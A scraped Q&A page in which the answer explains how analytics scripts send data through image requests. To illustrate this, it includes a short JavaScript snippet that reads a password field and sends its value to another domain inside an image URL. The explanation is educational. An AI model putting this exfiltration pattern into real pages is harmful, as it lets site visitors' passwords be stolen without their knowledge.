Sign Up

Sign Up to our social questions and Answers Engine to ask questions, answer people’s questions, and connect with other people.

Have an account? Sign In

Have an account? Sign In Now

Sign In

Login to our social questions & Answers Engine to ask questions answer people’s questions & connect with other people.

Sign Up Here

Forgot Password?

Don't have account, Sign Up Here

Forgot Password

Lost your password? Please enter your email address. You will receive a link and will create a new password via email.

Have an account? Sign In Now

You must login to ask a question.

Forgot Password?

Need An Account, Sign Up Here

Please briefly explain why you feel this question should be reported.

Please briefly explain why you feel this answer should be reported.

Please briefly explain why you feel this user should be reported.

Sign InSign Up

The Archive Base

The Archive Base Logo The Archive Base Logo

The Archive Base Navigation

  • SEARCH
  • Home
  • About Us
  • Blog
  • Contact Us
Search
Ask A Question

Mobile menu

Close
Ask a Question
  • Home
  • Add group
  • Groups page
  • Feed
  • User Profile
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Buy Points
  • Users
  • Help
  • Buy Theme
  • SEARCH
Home/ Questions/Q 8072355
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Editorial Team
Asked: June 5, 20262026-06-05T13:59:33+00:00 2026-06-05T13:59:33+00:00

Anyone knows how Google analytics or Clicky works? I’m stuck at the fact that

  • 0

Anyone knows how Google analytics or Clicky works?

I’m stuck at the fact that I searched the entire http://static.getclicky.com/js file and didn’t find any server requests in it. How does it send data without compromising its own security? Or else users could send false data by modifying the js.

  • 1 1 Answer
  • 0 Views
  • 0 Followers
  • 0
Share
  • Facebook
  • Report

Leave an answer
Cancel reply

You must login to add an answer.

Forgot Password?

Need An Account, Sign Up Here

1 Answer

  • Voted
  • Oldest
  • Recent
  • Random
  1. Editorial Team
    Editorial Team
    2026-06-05T13:59:34+00:00Added an answer on June 5, 2026 at 1:59 pm

    Images: these libraries use a trick where they encode all the tracking information they want, append it to the image URL, and “send” it by requesting the image. Server-side parsing of that image filename decodes the information.

    Suppose you had a password field that you wanted to send from mydomain.com to somedomain.com:

    <input type='password' id='p' />

    This javascript could send the contents by violating cross-site limits:

    var t = document.getElementById('p').value;
    var i = document.createElement('img');
    i.src = 'http://somedomain.com/imagescript.php?p=' + t;
    

    Cross-site scripting limitations don’t apply to images, and when you compose the image URL request in JavaScript, no browser or logic in the world can account for all possibilities. Suppose we’re lucky that GA is ethical and doesn’t snag form fields.

    • 0
    • Reply
    • Share
      Share
      • Share on Facebook
      • Share on Twitter
      • Share on LinkedIn
      • Share on WhatsApp
      • Report

Sidebar

Related Questions

Does anyone know how Google Analytics exports their PDFs? They don't seem to make
Anyone know how to use Google Analytics for a Drupal-powered company intranet site behind
Anyone knows why, compared to version v2, in v3 of google maps api using,
I was wondering if anyone knows more about the inner workings of the Google
Does anyone know why Google Analytics requires two separate script tags? Specifically, their instructions
With google analytics you can track ecommerce events, http://code.google.com/apis/analytics/docs/tracking/gaTrackingEcommerce.html I was wondering if this
Does anyone know of an analytics package, either open source or commercial, that can
I'm wondering if anyone knows about software that can automate custom builds for Ubuntu.
I was wondering if anyone knows of a way I can Authenticate a Google
I have a program in JAVA that sends an HTTP GET message to Google

Explore

  • Home
  • Add group
  • Groups page
  • Communities
  • Questions
    • New Questions
    • Trending Questions
    • Must read Questions
    • Hot Questions
  • Polls
  • Tags
  • Badges
  • Users
  • Help
  • SEARCH

Footer

© 2021 The Archive Base. All Rights Reserved
With Love by The Archive Base

Insert/edit link

Enter the destination URL

Or link to existing content

    No search term specified. Showing recent items. Search or use up and down arrow keys to select an item.